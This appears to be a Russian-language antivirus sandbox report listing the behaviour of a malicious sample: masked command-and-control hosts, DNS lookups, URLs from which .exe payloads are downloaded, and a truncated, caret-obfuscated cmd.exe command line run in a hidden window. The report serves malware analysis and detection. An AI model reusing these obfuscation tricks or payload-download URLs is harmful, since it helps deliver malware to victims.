Техническая информация
- '<SYSTEM32>\cmd.exe' wMic wMic wMic wMic & %Co^m^S^p^Ec^% /V /c set %JTSAqpAjHcZbLjG%=PlNPiXAjH&&set %qqCVQYFVqHE%=owe^r^s&&set %nvqoHIMkKadlFvs%=OLMtmRtHTTNij&&set %FQAKUVHNFEwkd...
- 'de#.##k-host.com':80
- 'ha####rooves.com':80
- 'he######eelsthemovie.com':80
- 'hi####ndfamily.org':80
- 'hi####ndfamily.org':443
- 'ki###73.com.br':80
- http://ha####rooves.com/mhjcyrd.exe
- http://hi####ndfamily.org/hcttgwa.exe
- 'hi####ndfamily.org':443
- DNS ASK de#.##k-host.com
- DNS ASK ha####rooves.com
- DNS ASK he######eelsthemovie.com
- DNS ASK hi####ndfamily.org
- DNS ASK ki###73.com.br
- '<SYSTEM32>\cmd.exe' wMic wMic wMic wMic & %Co^m^S^p^Ec^% /V /c set %JTSAqpAjHcZbLjG%=PlNPiXAjH&&set %qqCVQYFVqHE%=owe^r^s&&set %nvqoHIMkKadlFvs%=OLMtmRtHTTNij&&set %FQAKUVHNFEwkd...' (со скрытым окном)